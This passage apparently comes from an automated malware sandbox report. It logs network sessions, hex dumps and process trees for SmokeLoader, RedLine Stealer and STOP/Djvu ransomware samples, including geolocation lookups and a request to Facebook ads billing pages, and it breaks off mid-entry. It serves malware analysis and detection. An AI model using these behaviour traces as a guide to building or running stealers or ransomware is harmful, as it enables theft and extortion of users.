                                                                                    2023-02-07 18:45:53 UTC906INData Raw: 8b ab 10 ee 01 00 00 fe 01 00 00 2e 2e 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 96 8a 19 00 00 00 00 00 00 00 00 00 00 00 80 f0 70 00 01 01 00 00 f0 01 0e 00 ff 00 00 00 50 03 07 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 14 10 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3b ab 10 c0 7b ab 10 ef 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 e1 1e 00 00 3b 3b 00 00 5a 5a 00 00 78 78 00 00 97 97 00 00 b5 b5 00 00 d4 d4 00 00
                                                                                    Data Ascii: .. %pPTPT;{;;ZZxx
                                                                                    2023-02-07 18:45:53 UTC907INData Raw: 5f 5f 56 56 45 45 52 52 53 53 49 49 4f 4f 4e 4e 5f 5f 49 49 4e 4e 46 46 4f 4f 00 00 00 00 bd b9 eb 11 fe 00 01 01 07 07 13 13 01 01 11 11 07 07 13 13 01 01 11 11 3f 3f 00 00 00 00 00 00 04 04 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 40 02 00 01 01 53 53 74 74 72 72 69 69 6e 6e 67 67 46 46 69 69 6c 6c 65 65 49 49 6e 6e 66 66 6f 6f 00 00 1e 1c 02 00 01 01 30 30 34 34 30 30 39 39 30 30 34 34 62 62 30 30 00 00 2c 2c 0a 0a 01 01 43 43 6f 6f 6d 6d 6d 6d 65 65 6e 6e 74 74 73 73 00 00 4d 4d 69 69 6e 6e 69 69 62 62 6c 6c 69 69 6e 6e 6b 6b 00 00 34 34 0a 0a 01 01 43 43 6f 6f 6d 6d 70 70 61 61 6e 6e 79 79 4e 4e 61 61 6d 6d 65 65 00 00 00 00 4d 4d 69 69 6e 6e 69 69 62 62 6c 6c 69 69 6e 6e 6b 6b 00 00 3c 3c 0a 0a 01 01 46 46 69 69 6c 6c 65 65 44 44 65
                                                                                    Data Ascii: __VVEERRSSIIOONN__IINNFFOO??B@SSttrriinnggFFiilleeIInnffoo004400990044bb00,,CCoommmmeennttssMMiinniibblliinnkk44CCoommppaannyyNNaammeeMMiinniibblliinnkk<<FFiilleeDDe
                                                                                    2023-02-07 18:45:53 UTC909INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC910INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC911INData Raw: 03 65 65 ee ee d3 d3 d8 d8 c2 c2 c9 c9 3d 3c 17 17 11 11 18 18 01 01 6d 6d 57 57 5c 5c 40 40 bb bb a5 a5 ac ac 95 95 8b 8b f2 f2 fc fc e2 e2 d5 d5 df df d9 d9 cd cd 3f 30 36 36 22 22 18 18 15 15 0f 0f 05 05 72 72 61 61 58 58 55 55 b6 b6 a0 a0 8b 8b da da d7 d7 cd cd c3 c3 26 27 1d 1d 79 79 61 61 45 45 d1 d1 32 31 2f 2f 77 77 6f 6f a6 a6 95 95 8f 8f fb fb fd fd ec ec e6 e6 ca ca c4 c4 3f 3e 30 30 1a 1a 1d 1d 15 15 0f 0f 00 00 7a 7a 73 73 75 75 6d 6d 66 66 59 59 51 51 48 48 44 44 bf bf b2 b2 b4 b4 a8 a8 a2 a2 a5 a5 9f 9f 97 97 83 83 f5 f5 e2 e2 e5 e5 d2 d2 d5 d5 c2 c2 c5 c5 30 37 25 25 23 23 13 13 70 70 6e 6e 52 52 b6 b6 a0 a0 d7 d7 cd cd 3e 3f 16 16 09 09 7d 7d 4e 4e 41 41 b5 b5 83 83 fa fa ee ee d6 d6 c2 c2 1d 1e 18 18 6f 6f 9f 9f 97 97 dd dd d3 d3 2b 2a
                                                                                    Data Ascii: ee=<mmWW\\@@?066""rraaXXUU&'yyaaEE21//wwoo?>00zzssuummffYYQQHHDD07%%##ppnnRR>?}}NNAAoo+*


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    6192.168.2.349717162.0.217.254443C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:54 UTC915OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2023-02-07 18:45:54 UTC915INHTTP/1.1 429 Too Many Requests
                                                                                    Date: Tue, 07 Feb 2023 18:45:54 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block; report=...
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    2023-02-07 18:45:54 UTC916INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                    Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    7192.168.2.349721162.0.217.254443C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:58 UTC916OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2023-02-07 18:45:58 UTC916INHTTP/1.1 429 Too Many Requests
                                                                                    Date: Tue, 07 Feb 2023 18:45:58 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block; report=...
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    2023-02-07 18:45:58 UTC917INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                    Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    8192.168.2.349724162.0.217.254443C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:00 UTC917OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2023-02-07 18:46:00 UTC918INHTTP/1.1 429 Too Many Requests
                                                                                    Date: Tue, 07 Feb 2023 18:46:00 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block; report=...
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    2023-02-07 18:46:00 UTC918INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                    Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    9192.168.2.349725157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:01 UTC919OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:01 UTC919INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: 1d2ITlVEZob8fS8LbtYzHOrsRXQ3CoocNPTUh24s5Sg8naKnoxH+ll9hqfYCfaWvsqJrSwY2ClUB+0IVyWCc4A==
                                                                                    2023-02-07 18:46:01 UTC921INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 30 31 20 47 4d 54 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:01 GMTAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:19:43:58
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:198144 bytes
                                                                                    MD5 hash:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low

                                                                                    Target ID:4
                                                                                    Start time:19:44:10
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                    Imagebase:0x7ff69fe90000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Target ID:11
                                                                                    Start time:19:44:46
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\4113.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4113.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:387584 bytes
                                                                                    MD5 hash:B141BC58618C537917CC1DA179CBE8AB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 82%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Target ID:12
                                                                                    Start time:19:44:47
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Roaming\sievwvt
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\sievwvt
                                                                                    Imagebase:0x400000
                                                                                    File size:198144 bytes
                                                                                    MD5 hash:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 49%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Target ID:13
                                                                                    Start time:19:44:47
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 62%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Target ID:14
                                                                                    Start time:19:44:59
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    Imagebase:0x7b0000
                                                                                    File size:7722496 bytes
                                                                                    MD5 hash:B328ABE938AE81E9382BD6858A6EE77F
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\A33B.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    Reputation:low

                                                                                    Target ID:15
                                                                                    Start time:19:45:02
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low

                                                                                    Target ID:16
                                                                                    Start time:19:45:02
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    Imagebase:0x140000000
                                                                                    File size:3657728 bytes
                                                                                    MD5 hash:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 77%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Target ID:17
                                                                                    Start time:19:45:04
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\E4.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\E4.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:198656 bytes
                                                                                    MD5 hash:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                    Target ID:18
                                                                                    Start time:19:45:05
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ECFB.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ECFB.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:200192 bytes
                                                                                    MD5 hash:3A452937E8A961C5E19974C2CBB4AFAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 56%, ReversingLabs

                                                                                    Target ID:19
                                                                                    Start time:19:45:05
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    Wow64 process (32bit):true
